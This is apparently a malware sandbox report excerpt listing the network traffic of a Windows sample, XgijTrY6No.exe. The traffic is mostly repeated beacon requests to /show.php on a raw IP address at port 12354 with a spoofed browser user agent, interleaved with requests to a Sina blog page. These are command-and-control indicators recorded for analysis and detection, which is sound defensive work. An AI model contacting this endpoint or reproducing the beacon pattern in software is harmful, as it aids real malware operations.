Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: unknown | TCP traffic detected without corresponding DNS query: 107.163.241.204
Source: C:\Users\user\Desktop\XgijTrY6No.exe | Code function: 0_2_004026B0 recv,WSAGetLastError, 0_2_004026B0
Source: global traffic | HTTP traffic detected: GET /u/5655029807 HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) | Host: blog.sina.com.cn | Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
